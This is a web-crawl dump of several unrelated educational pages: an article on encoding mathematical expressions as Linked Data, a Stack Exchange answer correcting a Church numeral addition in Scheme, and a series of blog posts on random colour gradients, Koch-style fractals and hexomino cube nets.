msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:45e381fb-3620-4373-8e8e-357a9f0627ea>\",\"WARC-Concurrent-To\":\"<urn:uuid:3a3d5d23-c96f-4801-8eb8-eb5f5340053b>\",\"WARC-IP-Address\":\"212.33.73.131\",\"WARC-Target-URI\":\"http://mizar.uwb.edu.pl/version/current/html/proofs/stirl2_1/55_1\",\"WARC-Payload-Digest\":\"sha1:CD24DNO2IOZB6MOEKOZYWP7LFZCNNJDQ\",\"WARC-Block-Digest\":\"sha1:IOVEGTEJMAZNEGB2PTFCTD5F5NRO5KZY\",\"WARC-Identified-Payload-Type\":\"application/xml\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-47/CC-MAIN-2019-47_segments_1573496668004.65_warc_CC-MAIN-20191114053752-20191114081752-00025.warc.gz\"}"} |
https://semmtech.com/mathematicsandlinkeddata/ | [
"## Researching the Value of Mathematics-Enhanced Linked Data",
null,
"Mathematical operations are critical to managing data in Architecture, Engineering, and Construction (AEC). This is evident in the engineering standards that ensure the engineering practices, designs, and products are consistent and of high quality. These standards combine (1) textual descriptions and (2) mathematical information such as formulas and conditions. As organizations in the AEC sector strive for greater efficiency and collaboration, they increasingly use semantic information technologies, including Linked Data. These allow users to share and access data in a structured and machine-readable format.\n\nCurrently, semantic information works well for textual descriptions and is already used in standards such as IMBOR. However, expressing and using mathematics in Linked Data is less developed. Our innovation department is at the forefront of this field, i.e., Mathematics enhanced Linked Data, working on solutions that meet the needs of our clients. In this article, we delve into the research our intern Ani Mkheidze conducted in the field of Linked Data and mathematical operations. This research aimed to create a machine-readable format that reduces ambiguity in specifications (engineering standards), uses Linked Data to calculate and validate mathematical expressions, and makes it easier to share and understand mathematical information.\n\nA mathematical expression, which we often encounter in engineering standards, is made of elements arranged in a specific way according to rules. The most common elements are numbers, variables, and operations. The research focuses on decomposing these expressions, which means breaking down complex equations into smaller and simpler parts. It involves separating the variables and clearly defining the operators and symbols used. For example, in the simple equation a + b, the variables (a & b) are separated, and the operator is +. The meaning of the operator (In this case, the +-sign) is established by linking them to a concrete definition that machines can understand, which is called an ontology. This way, new operations can always be added.\n\nAs part of our research, we created two models to solve the challenge of making it easier to share and understand mathematical information for software. The first model uses existing technology (SPARQL) to turn a mathematical equation into a format that computers and humans can read. The second model decomposes the equation and embeds it in Linked Data. Both models do not require the user to write complicated expressions; an intuitive format exists for both. It is sufficient to provide the input data and the expressions, and the computer does the rest.\n\nThis research can potentially revolutionize how mathematical data is managed in the AEC sector, improving efficiency and collaboration between organizations. Both models have successfully achieved the goal of calculating and validating expressions, enabling clients to integrate mathematics into software and standardize the process. The second model aimed to decompose expressions, reducing ambiguity and facilitating swift and clear sharing of mathematical information. If you want to learn more about our research, including detailed evaluations and case studies, contact Sander Stolk, Sebastiaan Hoeboer, or Ani Mkheidze."
] | [
null,
"https://semmtech.com/wp-content/uploads/2022/10/AdobeStock_61724955.jpeg",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.9158715,"math_prob":0.8775193,"size":3497,"snap":"2023-40-2023-50","text_gpt3_token_len":632,"char_repetition_ratio":0.12940165,"word_repetition_ratio":0.01171875,"special_character_ratio":0.17243351,"punctuation_ratio":0.110154904,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9541877,"pos_list":[0,1,2],"im_url_duplicate_count":[null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-12-02T14:12:05Z\",\"WARC-Record-ID\":\"<urn:uuid:adf4a82b-a0b6-47d2-a6de-47ff837cf2b1>\",\"Content-Length\":\"73130\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c074fd06-e0bb-4da2-a0f5-b3f50a292cb7>\",\"WARC-Concurrent-To\":\"<urn:uuid:076e1f52-3a1f-4e52-abaf-6d9f5705e914>\",\"WARC-IP-Address\":\"151.101.194.159\",\"WARC-Target-URI\":\"https://semmtech.com/mathematicsandlinkeddata/\",\"WARC-Payload-Digest\":\"sha1:TM7FRAUQJCKF3IHP2UUHO46PDRIQ2KEE\",\"WARC-Block-Digest\":\"sha1:EKLFQSP3CKQ7TQ2ZLAQXLZJIXIXUO75N\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679100427.59_warc_CC-MAIN-20231202140407-20231202170407-00547.warc.gz\"}"} |
https://codereview.stackexchange.com/questions/141084/church-numerals | [
"# Church Numerals\n\nHere is exercise 2.6 from SICP:\n\nExercise 2.6: In case representing pairs as procedures wasn’t mind-boggling enough, consider that, in a language that can manipulate procedures, we can get by without numbers (at least insofar as nonnegative integers are concerned) by implementing 0 and the operation of adding 1 as\n\n(define zero (lambda (f) (lambda (x) x)))\n\n(lambda (f) (lambda (x) (f ((n f) x)))))\n\n\nThis representation is known as Church numerals, after its inventor, Alonzo Church, the logician who invented the λ-calculus.\n\nDefine one and two directly (not in terms of zero and add-1). (Hint: Use substitution to evaluate (add-1 zero)). Give a direct definition of the addition procedure + (not in terms of repeated application of add-1).\n\n (define one (lambda (f) (lambda (x) (f x))))\n\n(define two (lambda (f) (lambda (x) (f (f x)))))\n\n;; I used an identity function to check the + procedure\n(define (+ a b)\n(lambda (f)\n(lambda (x)\n((((a f) b) f) x))))\n\n\nHow can I improve this code?\n\nYour function + is not correct.\n\nThe definition of the sum of two Church numerals is the following:\n\n(define (plus a b)\n(lambda (f)\n(lambda (x)\n((a f) ((b f) x)))))\n\n\n(see for instance wikipedia).\n\nIn fact, the Church numeral n can be defined as the functional that applies a given functionf n times to a given value x. So in the above definition, the sum (plus a b) first apply b times f to x, and to that result f is applied a times. In your definition, instead, the types of the applications inside the body of the function are wrong.\n\nHow to test for the correctness of Church numerals and functions over them?\n\nYou simply apply a Church numeral to the function integer successor (i.e. (lambda(x)(+ x 1))) and the number 0 to find if it produces the corresponding “regular” numeral. So, for instance:\n\n(define (succ x) (+ x 1)) ;; here + is the integer addition, not your function!\n\n((zero succ) 0) ; produces 0\n((one succ) 0) ; produces 1 etc.\n\n\nSo you can test if the sum is correct with:\n\n(((plus one two) succ) 0) ; produces 3\n\n\nIf you try your function, you will find:\n\n(((+ one two) succ) 0) ; raises an error"
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.8542732,"math_prob":0.993511,"size":1019,"snap":"2019-43-2019-47","text_gpt3_token_len":273,"char_repetition_ratio":0.15665025,"word_repetition_ratio":0.01775148,"special_character_ratio":0.28949952,"punctuation_ratio":0.0964467,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9988914,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-11-12T12:33:25Z\",\"WARC-Record-ID\":\"<urn:uuid:27b34ee5-c4e2-4930-a288-cdd457570226>\",\"Content-Length\":\"134053\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:27106fe3-89ed-4b9e-8712-9ca820c22ecf>\",\"WARC-Concurrent-To\":\"<urn:uuid:5ea9e257-1211-4c80-8325-357f3a2f5442>\",\"WARC-IP-Address\":\"151.101.193.69\",\"WARC-Target-URI\":\"https://codereview.stackexchange.com/questions/141084/church-numerals\",\"WARC-Payload-Digest\":\"sha1:S3RPTI75M3XSWZ2EOR77DFTLE3QRTR3J\",\"WARC-Block-Digest\":\"sha1:4GSDERYLXCZTDJP3I4KXAXWNNPRQJ6NX\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-47/CC-MAIN-2019-47_segments_1573496665521.72_warc_CC-MAIN-20191112101343-20191112125343-00086.warc.gz\"}"} |
https://cre8math.com/category/geometry-2d/page/5/ | [
"## Evaporation II\n\nLast week, we began exploring the piece Evaporation. In particular, we looked at two aspects of the piece — randomness of both the colors and the sizes of the circles — and experimented with these features in Python. Look at last week’s post for details!",
null,
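Before going through the details, here is a minimal self-contained sketch of the full effect, random color jitter that grows toward the bottom of the image. It assumes matplotlib and an approximate sky-blue base color, and it is an added illustration rather than the original worksheet code:

```python
import random
import matplotlib.pyplot as plt

random.seed(2015)                       # the seed completely determines the texture
rows, cols = 20, 20
base = (0.4, 0.7, 0.9)                  # a sky blue; assumed, not the artist's exact RGB

fig, ax = plt.subplots(figsize=(5, 5))
for i in range(rows):
    y = i / rows                        # 0 at the bottom, approaching 1 at the top
    spread = (1 - y) ** 2               # quadratic gradient: calm at top, random at bottom
    for j in range(cols):
        c = [max(ch - random.uniform(0, spread), 0) for ch in base]
        r = random.uniform(0.30, 0.48) / cols        # circle sizes are randomized too
        ax.add_patch(plt.Circle(((j + 0.5) / cols, (i + 0.5) / rows), r, color=c))
ax.set_aspect("equal"); ax.axis("off")
plt.show()
```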
"Today, we’ll examine the third significant aspect of the piece — the color gradient. The piece is a pure sky blue at the top, but becomes more random toward the bottom. How do we accomplish this?\n\nEssentially, we need to find a way to introduce “0” randomness to each color at the top, and more randomness as we move toward the bottom. To understand the concept, though, we’ll be introducing 0 randomness at the bottom, and more as we move up. You’ll see why in a moment.\n\nLet’s first look at a linear gradient. Imagine that we’re working with a",
null,
"$1\\times1$ square — we can always scale later. Here’s what it looks like:",
null,
"The “linear” part means we’re looking at randomness as a function of",
null,
"$y^1=y.$ So when",
null,
"$y=0,$ we subtract",
null,
"$y=0$ randomness to each color. But when",
null,
"$y=1/2,$ we subtract a random number between",
null,
"$0$ and",
null,
"$y=1/2$ from each of the RGB values. Finally, at the very top, we’re subtracting a random number between",
null,
"$0$ and",
null,
"$1$ from each RGB value. Recall that if an RGB value would ever fall below",
null,
"$0$ as a result of subtraction, we’d simply treat the value as",
null,
"$0.$\n\nWhy do we subtract as we go up? Recall that black has RGB values",
null,
"$(0,0,0),$ so subtracting the randomly generated number pushes the sky blue toward black. If we added instead, this would push the sky blue toward white. In fact, you can push the sky blue toward any color you want, but that’s a little too involved for today’s post.\n\nThe piece Evaporation was actually produced with a quadratic gradient. Let’s look at a picture first:",
null,
"That the gradient is quadratic means that the randomness introduced is proportional to",
null,
"$y^2$ for each value of",
null,
"$y.$ In other words, at a level of",
null,
"$y=1/2$ on our square, we subtract a random number between",
null,
"$0$ and",
null,
"$(1/2)^2=1/4.$\n\nYou can visually see this as follows. Look at the gradient of color change from",
null,
"$0$ to",
null,
"$1/2$ for the quadratic gradient. This is approximately the same color change you see in the linear gradient between",
null,
"$0$ and",
null,
"$1/4.$ Why does this happen? Because when you square numbers less than",
null,
"$1,$ they get smaller. So smaller numbers will introduce less randomness in a quadratic gradient than they will in a linear gradient.\n\nWe can go the other way, we well. If we use a quadratic gradient (exponent of",
null,
"$2>1$), the color changes more gradually at the bottom. But if we use an exponent less than",
null,
"$1$ (such as in taking a root, like a square root or cube root), we get the opposite effect: color changes more rapidly at the bottom. This is because taking a root of a number less than",
null,
"$1$ increases the number. It’s easiest to see this with an example:",
null,
"In this case, the exponent used is",
null,
"$0.4,$ so that for a particular",
null,
"$y$ value, a random number between",
null,
"$0$ and",
null,
"$y^{0.4}$ is subtracted from each RGB value. Note how quickly the color changes from the sky blue at the bottom toward very dark colors at the top.\n\nOf course this is just one way to vary colors. But I find it a very interesting application of power and root functions usually learned in precalculus — using computer graphics, we can directly translate an algebraic, functional relationship geometrically into a visual gradient of color. Another example of why it is a good idea to enlarge your mathematical toolbox — you just never know when something will come in handy! If I didn’t really understand how power and root functions worked, I wouldn’t have been able to create this visual effect so easily.\n\nNow it’s your turn! You can visit the Evaporation worksheet to try creating images on your own. If you’ve been trying out the Python worksheets all along, the code should start to look familiar. But a few comments are in order.\n\nFirst, we just looked at a",
null,
"$1\\times 1$ square. It’s actually easier to think in terms of integer variables “width” and “height” (after all, there is no reason our image needs to be square). In this case, we use “j” as the height parameter, since it is more usual to use variables like “i” and “j” for integers. So “j/height” would correspond to",
null,
"$y.$ This would produce a color gradient of light to dark form bottom to top.\n\nTo make the gradient go from top to bottom, we use “(height-j)/height” instead (see the Python code). This makes values near the top of the image correspond to",
null,
"$0,$ and values near the bottom of the image correspond to",
null,
"$1.$ I’ll leave it to you to explore all the other details of the Python code.\n\nPlease feel free to comment with images you create using the Sage worksheet!\n\nAs mentioned in the previous post as well, each parameter you change — each number which appears anywhere in your code — affects the final image. Some choices seem to give more appealing results than others. This is where are meets technology.\n\nAs a final word — the work on creating fractals is still ongoing. I’ve learned to make movies now using Processing:\n\nYou’ll notice how three copies of one fractal image morph into one of another. You can find more examples on Twitter: @cre8math. Once I feel I’ve had enough experience using Processing, I’ll post about how you can use it yourself. The great thing about Processing is that you can use Python, so all your hard work learning Python will yield even further dividends!\n\n## Evaporation I\n\nThis and the next post will walk you through how to create digital art similar to Evaporation. I’ll also show you some Python code you can use yourself to experiment.",
null,
"There are three significant features of Evaporation. First is the randomness of the colors. Second — if you look closely — the sizes of the circles are also different; these are randomly generated as well. The third feature is the gradient of the color — from a pure sky blue at the top, to a fairly randomly colored row of circles at the bottom. We’ll look at the first two features today.",
null,
"Let’s look at color. In the figure above, the small teal square at the left has RGB values of 0, 0.5, and 0.7, respectively. The larger square at the left consists of 100 smaller squares. The color of each of these squares is generated by adding a random number between 0 and 0.1 to each of the RGB values 0, 0.5, and 0.7 — with a different random number added to each value. In the middle square, a random number between 0 and 0.2 is added, so this creates a wider range of color values. For the right square, the random numbers added are between 0 and 0.3.\n\nBut there is no reason that the ranges need to the same for each color. In the images below, the red values have a wider range of randomness then the green, which is “more random” than the blue.",
null,
"You can see that different ranges of random numbers create different color “textures.” This is where I think computer meets art — as a programmer, when it comes to creating random numbers, you have to specify a range for the randomness of each variable. The choices you make determine how your image looks. How do you make “artistic” choices? There is no easy answer, of course.\n\nAnother way to use randomness is by varying the size of the graphic objects. In the left square below, texture is created by randomly changing the radii of the circles.",
null,
"In the middle square, the circles are all the same size, but random shades of gray. The right square varies both the size of the circles and their color. The final result depends on “how much” randomness is used. You can try it for yourself by altering the Python code linked to below — change the randomness and see what happens!\n\nI think of my laptop as an art laboratory. It is a place to experiment with different ideas — change this parameter, increase randomness, try out different color combinations. Can you imagine creating any of the images in this post by hand? The computer allows us to perform experiments unthinkable to Rembrandt and Van Gogh. We may lose the texture of brush strokes or the dimensionality of paint on canvas, but what we gain by having a programming language at our disposal makes up for this loss. At least in my opinion….\n\nNow let’s look at how we can use Python to create these images. You can experiment with this color and texture worksheet.\n\nThere is not much more to say here since a lot is explained in the worksheet. But as you are creating, keep a few things in mind.\n\n1. Use descriptive variable names. This helps a lot when you’re looking a lines of code. Using variables a, b, c, etc., doesn’t help much when you’re looking at a program you wrote a few months ago.\n\n2. Comment liberally! Notes to yourself are easy to use in Python — just start a line (or part of a line) with the “\\#” character. You’ll thank yourself later.\n\n3. Save versions often! I won’t bore you with stories of using Mathematica to do some intense computations for creating digital art — and then read the “Mathematica quit unexpectedly” message on my screen — before I saved my work. I’ve encountered this in Python, too — if you use the online version, you’re connecting to an external server, which hopefully will not encounter problems while you’re working….\n\nAlso, as you change parameters, you may want to keep track of results you like. If there are a lot of these, sometimes I write the parameters as comments — so I can reproduce them later. Very important: don’t forget to keep track of the random number seed you use! The feel and texture of an image can vary dramatically with the random number seed, so don’t ignore this vital parameter.\n\nOne final thought. In creating this type of art, I keep in mind the tension between structure and randomness. You can use the computer to create randomness — but if there’s too much randomness, the image doesn’t seem to hang together. But if there’s too much structure, the image can lose its interesting texture, and appear flat and purely two-dimensional. So the choice of parameters in creating randomness is fairly crucial in determining how the final image will look. And as I’ve said before — this is where technology meets art. It is fairly easy to create a computer-generated image — but not as easy to create computer-generated art. The difference is not exactly easy to describe — and certainly opinions will differ. It is the questions which arise in describing the difference which are intriguing and exciting.\n\nEnough philosophizing. Time to begin the artistic process! Feel free to comment by posting any images you create using the Python code.\n\n## Creating Fractals III: Making Your Own\n\nLast week, we laid down some of the mathematical foundation needed to generate fractal images. In this third and final post about creating fractals, we’ll discuss in some detail Python code you can adapt to making your own designs. 
Follow along in this Sage notebook.\n\nIn order to produce fractal images iteratively, we need a function which returns the highest power of 2 within a positive integer (as discussed last week). It is not difficult to write a recursive routine to do this, as is seen in the notebook. This is really all we need to get started. The rest involves creating the graphics. I usually use PostScript for my images, like the one below discovered by Matthieu Pluntz. There isn’t time to go into that level of detail here, though.",
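One way to write the recursive routine mentioned here (the notebook's version may differ in details):

```python
def highest_power_of_2(n):
    """Return the exponent of the largest power of 2 dividing the positive integer n."""
    if n % 2 == 1:            # odd numbers contain no factor of 2
        return 0
    return 1 + highest_power_of_2(n // 2)

print([highest_power_of_2(k) for k in (2, 6, 8, 10, 14)])   # [1, 1, 3, 1, 1]
```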
null,
"As far as the graphics are concerned, it would be nice to have an easily described color palette. You might look here to find a wide range of predefined colors, which are available once we execute the “import mathplotlib” command (see Line 20). These names are used in the “colors” variable. Since each motif has four segments, I’ll color each one differently (though you may choose a different color scheme if you want to).\n\nThe loop is fairly straightforward. On each iteration, first find the correct angle to turn using the highestpowerof2 function. Then the segment to add on to the end of the path is",
null,
"$({\\rm len}\\cdot\\cos(\\theta), {\\rm len}\\cdot\\sin(\\theta)),$\n\nwhich represents converting from polar to rectangular coordinates. This is standard fare in a typical high school precalculus course. Note the color of the segment is determined by i % 4, since 0 is the index of the first element of any list in Python.\n\nAll there is left to do is output to the screen. We’re done! You can try it yourself. But note that the way I defined the function, you have to make the second argument negative (compare the image in the notebook with last week’s post). Be patient: some of these images may take a few moments to generate. It would definitely help the speed issue if you downloaded Sage on your own computer.\n\nTo create the image shown above, you need to use angles of 90 and -210 (I took the liberty of rotating mine 15 degrees to make it look more symmetrical). To create the image below, angles of 90 and -250 are used. However, 26,624 steps are needed to create the entire image! It is not practical to create an image this complex in the online Sage environment.",
null,
"How do you know what angles to use? This is still an open question — there is no complete answer that I am aware of. After my first post on October 4, Matthieu Pluntz commented that he found a way to create an infinite variety of fractal images which “close up.” I asked him how he discovered these, and he responded that he used a recursive algorithm. It would take an entire post just to discuss the mathematics of this in detail — so for now, we’ll limit our discussion to how to use this algorithm. I’ve encoded it in the function “checkangles.”\n\nTo use this function, see the examples in the Sage notebook. Be careful to enter angles as negative when appropriate! Also, you need to enter a maximum depth to search, since perhaps the angles do not result in an image which “closes up,” such as with 11 and -169. But here’s the difficult part mathematically — just because our algorithm doesn’t find where 11 and -169 closes up does not mean that the fractal doesn’t close. And further, just because our algorithm produced a positive result does not mean the algorithm must close. Sure, we’ve found something that produces many results with interesting images — which suggests we’re on the right track. But corroboration by a computer program is not a proof.\n\nAt the end of the notebook, I wrote a simple loop illustrating how you can look for many possibilities to try at once. The general rule of thumb is that the more levels required in the algorithm to produce a pair of angles (which is output to the screen), the more segments needed to draw it. I just looked for an example which only required 5 levels, and it was fairly easy to produce.\n\nSo where do we go from here? Personally, I’ve found this investigation fascinating — and all beginning from a question by a student who is interested in learning more about fractals. I’ve tried to give you an idea of how mathematics is done in the “real world” — there is a lot of exploration involved. Proofs will come later, but it is helpful to look at lots of examples first to figure out what to prove. When I find out something significant, I’ll post about it.\n\nAnd I will admit a recent encounter with the bane of a programmer’s existence — the dreaded sign error. Yes, I had a minus sign where I should have had a plus sign. This resulted in my looking at lots of images which did not close up (instead of closing up, as originally intended). Some wonderful images resulted, though, like the one below with angles of 11 and -169. Note that since the figure does not close up (as far as I know), I needed to stop the iteration when I found a sufficiently pleasing result.",
null,
"If I hadn’t made this mistake, I might have never looked at this pair of angles, and never created this image. So in my mind, this wasn’t really a “mistake,” but rather a temporary diversion along an equally interesting path.\n\nI’ve been posting images regularly to my Twitter feed, @cre8math. I haven’t even touched on the aesthetic qualities of these images — but suffice it to say that it has been a wonderful challenge to create interesting textures and color effects for a particular pair of angles. Frankly, I am still amazed that such a simple algorithm — changing the two angle parameters used to create the Koch snowflake — produces such a wide range of intriguing mathematical and artistic objects. You can be sure that I’m not finished exploring this amazing fractal world quite yet….\n\n## Creating Fractals II: Recursion vs. Iteration\n\nThere was such a positive response to last week’s post, I thought I’d write more about creating fractal images. In the spirit of this blog, what follows is a mathematical “stream of consciousness” — that is, my thoughts as they occurred to me and I pursued them. Or at least a close approximation — thoughts tend to jump very nonlinearly, and I do want the reader to be able to follow along….\n\nLet’s begin at the beginning, with one of my first experiments. Here, the counterclockwise turns are 80 degrees, and the clockwise turns are 140 degrees.",
null,
"One observation I had made in watching PostScript generate such images was that there was “overlap”: the recursive algorithm kept going even if the image was completely generated. Now the number of segments drawn by the recursive algorithm is a power of 4, since each segment is replaced by 4 others in the recursive process. So if the number of segments needed to complete a figure is not a power of 4, the image generation has to be stopped in the middle of a recursive call.\n\nThis reminded me of something I had investigated years ago — the Tower of Hanoi problem. This is a well-known example of a problem which can be solved recursively, but there is also an iterative solution. So I was confident there had to be an iterative way to generate these fractal images as well.\n\nI needed to know — at any step along the iteration — whether to turn counterclockwise or clockwise. If I could figure this out, the rest would be easy. So I wrote a snippet of code which implemented the recursive routine, and output a 0 if there was a counterclockwise turn, and a 1 if there was a clockwise turn. For 2 levels of recursion, this sequence is\n\n0, 1, 0, 0, 0, 1, 0, 1, 0, 1, 0, 0, 0, 1, 0.\n\nThe ones occur in positions 2, 6, 8, 10, and 14.\n\nI actually looked at 1024 steps in the iteration, and noticed that the ones occur in exactly those positions whose largest power of 2 is odd. Each of 2, 6, 10, and 14 has one power of 2, and 8 has three.\n\nYou might be wondering, “How did you notice that?” Well, the iterative solution of the Tower of Hanoi does involve looking at the powers of 2 within numbers, so past experience suggested looking along those lines. This is a nice example of how learning neat math can enlarge your mathematical “toolbox.” You never know when something might come in handy….\n\nThere was other interesting behavior as well — but it’s simpler if you just watch the video to see what’s happening.\n\nFirst, you probably noticed that each of the 18 star arms takes 32 steps to create. And that some of the star arms — eight of them — were traversed twice. This means that 18 + 8 = 26 arms were drawn before the figure was complete, for a total of 832 steps. Note that the recursive algorithm would need 1024 steps to make sure that all 832 steps were traversed — but that means an overlap of 192 steps.\n\nNow let’s see why some of the arms were traversed twice. The 32nd step of the first arm is produced after 31 turns, and so the 32nd turn dictates what happens here. Now the highest power of 2 in 32 is 5, which is odd – so a clockwise turn of 140 degrees is made. You can see by looking at the first 33 steps that this is exactly what happens. The 32nd step takes you back to the center, and then a 140 degree clockwise turn is made.",
null,
"Now after the next arm is drawn, the turn is determined by the 64th angle. But 6 is the highest power of two here, and so an 80 degree counterclockwise turn is made — but this takes you over the same arm again!",
null,
"Note that we can’t keep traversing the same arm over and over. If we add 32 to a number whose highest power of 2 is 6:",
null,
"$2^6m+2^5=2^5(2m+1),$\n\nwe get a number whose highest power of 2 is 5 again (since 2m + 1 must be odd). Since this power is odd, a clockwise turn will be made.\n\nSo when do we repeat an arm? This will happen when we have a counterclockwise turn of 80 degrees, which will happen when the highest power of 2 is even (since an odd power takes you clockwise) — when looking at every 32nd turn, that is. So, we need to look at turns\n\n32, 64, 96, 128, 160, 192, 224, etc.\n\nBut observe that this is just\n\n32 x (1, 2, 3, 4, 5, 6, 7, etc.).\n\nSince 32 is an odd power of two, the even powers of two must occur when there is an odd power of 2 in 1, 2, 3, 4, 5, 6, 7, etc. In other words, in positions 2, 6, 8, 10, 14, etc.\n\nTo summarize this behavior, we can state the following simple rule: arms move seven points counterclockwise around the circle, except in the case of the 2nd, 6th, 8th, 10th, 14th, etc., arms, which repeat before moving seven points around. Might be worth taking a minute to watch the video again….\n\nWe can use this rule to recreate the order in which the star arms are traversed. Start with 1. The next arm is 1 + 7 = 8. But 8 is the 2nd arm, so it is repeated — and so 8 is also the third arm. The fourth arm is 8 + 7 = 15, and the fifth is seven positions past 15, which is 4. Mathematically, we say 15 + 7 = 4 modulo 18, meaning we add 15 and 7, and then take the remainder upon dividing by 18. This is know as modular arithmetic, and is one of the first things you learn when studying a branch of mathematics called number theory.\n\nThe sixth arm is 4 + 7 = 11, which is repeated as the seventh arm. You can go on from here….\n\nThere are still some questions which remain. Why 32 steps to complete an arm? Why skip every seventh arm? Why are the arms 20 degrees apart? These questions remain to be investigated more thoroughly. But I can’t stress what we’re doing strongly enough — using the computer to make observations which can be stated mathematically very precisely, and then looking at a well-defined algorithm to (hopefully!) prove that our observations are accurate. More and more — with the advent of technology — mathematics is becoming an experimental science.\n\nI’ll leave you with one more video, which shows PostScript creating a fractal image. But laying a mathematical foundation was important — so next week, we can look at how you can make your own fractals in Python using an iterative procedure. This way, you can explore this fascinating world all on your own….\n\nThere are 10 levels of recursion here, and so 1,048,576 segments to draw. To see the final image, visit my Twitter feed for October 9. Enjoy!\n\n## Creating Fractals\n\nRecently, I’ve been working with a psychology student interested in how our brains perceive fractal images in nature (trees, clouds, landscapes, etc.). I dug up some old PostScript programs which reproduced images from The Algorithmic Beauty of Plants, which describes L-systems and how they are used to model images of plants. (Don’t worry if you don’t have the book or aren’t familiar with L-systems — I’ll tell you everything you need to know.)\n\nTo make matters concrete, I changed a few parameters in my program to produce part of a Koch snowflake.",
null,
"The classical way of creating a Koch snowflake is to begin with the four-segment path at the top, and then replace each of the four segments with a smaller copy of this path. Now replace each of the segments with an even smaller copy, and recurse until the copies are so small, no new detail is added.\n\nAlgorithmically, we might represent this as\n\nF +60 F -120 F +60 F,\n\nwhere “F” represents moving forward, and the numbers represent how much we turn left or right (with the usual convention that positive angles move counter-clockwise). If you start off moving to the right from the red dot, you should be able to follow these instructions and see how the initial iteration is produced.\n\nThe recursion comes in as follows: now replace each occurrence of F with a copy of these instructions, yielding\n\nF +60 F -120 F +60 F +60\n\nF +60 F -120 F +60 F -120\n\nF +60 F -120 F +60 F +60\n\nF +60 F -120 F +60 F\n\nIf you look carefully, you’ll see four copies of the initial algorithm separated by turning instructions. If F now represents moving forward by 1/3 of the original segment length, when you execute these instructions, you’ll get the second image from the top. Try it! Recursing again gives the third image, and one more level of recursion results in the last image.\n\nThomas thought this pretty interesting, and proceed to ask what would happen if we changed the angles. This wasn’t hard to do, naturally, since the program was already written. He suggested a steeper climb of about 80 degrees, so I changed the angles to +80 and -140.",
null,
"Surprise! You’ll easily recognize the first two iterations above, but after five iterations, the image closes up on itself and creates an elegant star-shaped pattern.\n\nI was so intrigued by stumbling upon this symmetry, I decided to explore further over the upcoming weekend. My next experiment was to try +80 and -150.",
null,
"The results weren’t as symmetrical, but after six levels of recursion, an interesting figure with bilateral symmetry emerged. You can see how close the end point is to the starting point — curious. The figure is oriented so that the starting points (red dots) line up, and the first step is directly to the right.\n\nAnother question Thomas posed was what would happen if the lengths of the segments weren’t all the same. This was a natural next step, and so I created an image using angles of +72 and -152 (staying relatively close to what I’d tried before), and using 1 and 0.618 for side lengths, since the pentagonal motifs suggested the golden ratio. Seven iterations produced the following remarkable image.",
null,
"I did rotate this for aesthetic reasons (-24.7 degrees, to be precise). There is just so much to look at — and all produced by changing a few parameters in a straightforward recursive routine.\n\nMy purpose in writing about these “fractal” images this week is to illustrate the creative process in doing mathematicsThis just happened a few days ago (as I am writing this), and so the process is quite fresh in my mind — a question by a student, some explorations, further experimentation, small steps taken one at a time until something truly wonderful emerges. The purist will note that the star-shaped images are not truly fractals, but since they’re created with an algortihm designed to produce a fractal (the Koch snowflake), I’m taking a liberty here….\n\nThis is just a beginning! Why do some parameters result in symmetry? How can you tell? When there is bilateral symmetry, what is the “tilt” angle? Where did the -24.7 come from? Each new image raises new questions — and not always easy to answer.\n\nTwo weeks ago, this algorithm was collecting digital dust in a subdirectory on my hard drive. A simple question resurrected it — and resulted in a living, breathing mathematical exploration into an intensely intriguing fractal world. This is how mathematics happens.\n\n## Hexominoes and Cube Nets\n\nI have always been fascinated by polyominoes — geometrical shapes made by connecting unit squares edge to edge. (There’s a lot about polyominoes online, so take a few moments to familiarize yourself with them if they’re new to you.)",
null,
"Today I’ll talk about hexominoes (using six unit squares), since I use them in the design of my current website. There are a total of 35 hexominoes — but I didn’t want all of them on my home page, since that seemed too cluttered. But there are just 11 hexominoes which can be folded into a cube — I did want my choice to have some geometrical significance! These are called nets for a cube, and formed a reasonable subset of the hexominoes to work with. Note that the count of 11 nets means that rotating or turning over a net counts as the same one. (And if you want an additional puzzle — show that aside from rotating or reflecting, there are just 11 nets for a cube.)\n\nNow how should I arrange them? I also wanted to use the hexominoes for a background for other pages, so I thought that if I made a 6 by 11 rectangle with them, that would be ideal — I could just tile the background with rectangles.\n\nThis is not possible, however — I wrote a computer program to check (more later). But if you imagine shifting a row of the 6 by 11 rectangle one or two squares, or perhaps a column — you would still occupy 66 square units, and the resulting figure would still tile the plane. This would still be true if you made multiple row/column shifts.\n\nSo I wrote a program which did exactly that — made random row and column shifts of a 6 by 11 rectangle, and then checked if the 11 hexominoes tiled that figure. After several hours of running, I found one — the one you see on my home page. If you look carefully, you can see the row and column shifts for yourself.\n\nIs this the only possibility? I’m not sure, but it’s the only one I found — and I liked the arrangement enough to use it on my website. If you look at some of the other pages — like one of my course websites — you’ll see a smaller version of this image tiling the background. However, to repeat the pattern in the background, I needed to make a “rectangular” version of the image:",
null,
"The colors are muted since I didn’t want the background to stand out too much. And you’ll notice that some of the hexominoes leave one edge of the rectangle and “wrap around” the opposite edge. But if you look closely, you can definitely find all 11 hexominoes in this 6 by 11 rectangle.\n\nThis wasn’t my first adventure with hexominoes — a few years ago, I created a flag of Thailand since I was doing some workshops there. Flags are generally rectangular in shape.\n\nBut you can’t create a rectangle with the 35 hexominoes! Let’s see why not. Imagine a rectangle on a checkerboard or chessboard. When you place a hexomino, it will cover some black squares and some white squares.",
null,
